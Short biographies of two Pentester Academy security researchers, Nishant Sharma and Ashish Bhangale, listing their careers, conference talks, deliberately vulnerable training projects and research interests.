Nishant Sharma is a researcher and course creator at Pentester Academy, prior to which he was a core firmware developer at Mojo Networks (previously known as AirTight Networks). He presented WiDy (Under $5 WiFi Hacker Gadget) at the Black Hat Asia Arsenal 2017. He has contributed to multiple projects like the Vulnerable Router Project and Damn Vulnerable WordPress. He has also contributed to the "Pentest Gadget book" authored by Mr. Vivek Ramachandran. He has a Master's degree in Information Security from IIIT Delhi. Nishant has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, forensics and cryptography.

Ashish Bhangale
Ashish Bhangale is a Sr. Security Researcher at Pentester Academy. He has 5+ years of experience in network and web application security. He has previously worked with various law enforcement agencies as a Digital Forensics Investigator. He was responsible for developing and testing the Chigula and Chellam frameworks. He has also created and managed multiple projects like the Command Injection & Arbitrary File Upload Vulnerable Web Application OS (a collection of vulnerable OSes) and Damn Vulnerable WordPress. He co-presented WiDy (Under $5 WiFi Hacker Gadget) at the Black Hat Asia Arsenal 2017. His areas of interest include forensics, WiFi and AD security.

Back to top